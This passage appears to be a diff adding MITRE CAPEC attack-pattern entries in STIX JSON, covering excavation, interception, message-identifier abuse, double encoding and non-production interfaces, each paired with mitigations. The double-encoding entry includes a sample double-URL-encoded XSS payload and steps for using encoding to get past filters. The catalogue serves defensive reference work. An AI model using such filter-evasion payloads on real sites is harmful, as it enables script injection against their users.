For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc." + ], + "x_capec_resources_required": [ + "A client application, such as a web browser, or a scripting language capable of interacting with the target." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-116", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + } + ], + "id": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Excavation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_extended_description": "\n This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. 
Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_prerequisites": [ + "An adversary requires some way of interacting with the system." + ], + "x_capec_resources_required": [ + "A tool, such as an Adversary in the Middle (CAPEC-94) Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Minimize error/response output to only what is necessary for functional use or corrective language.", + "id": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remove potentially sensitive information that is not necessary for the application's functionality.", + "id": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a976d5b-38ec-4508-8329-3a6a82d44d97", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. 
However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.", + "external_references": [ + { + "external_id": "CAPEC-117", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_prerequisites": [ + "The target must transmit data over a medium that is accessible to the adversary." + ], + "x_capec_resources_required": [ + "The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties.", + "id": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-117-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--859073fb-487f-4a31-b50e-4cceb762f731", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "target_ref": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. 
If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.", + "external_references": [ + { + "external_id": "CAPEC-12", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/12.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Choosing Message Identifier", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \"Partners\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Adversaries having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows adversaries without partner status from conducting this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Nature of Messages: Determine the nature of messages being transported as well as the identifiers to be used as part of the attack

Experiment

  1. Authenticate: If required, authenticate to the distribution channel

  2. Identify Known Client Identifiers: If any particular client's information is available through a control channel available to all users, the adversary will discover particular identifiers for targeted clients by observing this channel, or requesting client information through this channel.

  3. Change Message Identifier: Adversaries with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_prerequisites": [ + "Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.", + "Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means." + ], + "x_capec_skills_required": { + "Low": "All the adversary needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. 
The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n ", + "id": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3057788f-a10c-42ba-86f8-673bdaa92ba0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a9ab8b72-4e44-4c81-bf44-e366ff5503d4", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Re-architect system input/output channels as appropriate to distribute self-protecting data. 
That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them.", + "id": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-12-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d1d83e8-400f-438d-a941-c0692758395f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dcc7f9fa-ae3e-4b43-ae71-e3c7a72ea187", + "target_ref": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) 
by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS 
Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

  2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. 
Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44b07350-79d0-449c-b510-54552ac1b8ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.", + "id": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfa73c3f-86a6-476f-aab5-335c5f41f2ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \"POST method whenever possible.", + "id": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e482c72-7993-4ddf-8fca-22de8312c642", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. 
Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.", + "id": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba444e1f-3d84-4501-b9c6-09b06a824f96", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Refer to the RFCs to safely decode URL.", + "id": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ad9490-5c2d-4430-8ecc-b0740ebc3c54", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + 
{ + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.", + "id": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f1b0725-8a4f-49f1-9954-eb67b0182990", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).", + "id": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be25410a-e03c-4307-88da-60d4e71e7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "target_ref": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable.\n ", + "external_references": [ + { + "external_id": "CAPEC-121", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/121.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-1209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1209.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1295.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + }, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "external_id": "CWE-1313", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/1313.html" + }, + { + "description": "Swarup Bhunia, Mark M. Tehranipoor, The Hardware Trojan War: Attacks, Myths, and Defenses, 2017--11---30, Springer", + "external_id": "REF-588", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Boyang Du, Matteo Sonza Reorda, Luca Sterpone, Luis Parra, Marta Portela-Garcia, Almudena Lindoso, Luis Entrena, Exploiting the debug interface to support on-line test of control flow errors, 2013--07---08, Institute of Electrical and Electronics Engineers (IEEE)", + "external_id": "REF-589", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + } + ], + "id": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploit Non-Production Interfaces", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Alter Execution Logic" + ], + "Authentication": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Read Data", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data", + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Some software applications include application programming interfaces (APIs) that are intended to allow an administrator to test and refine their domain. 
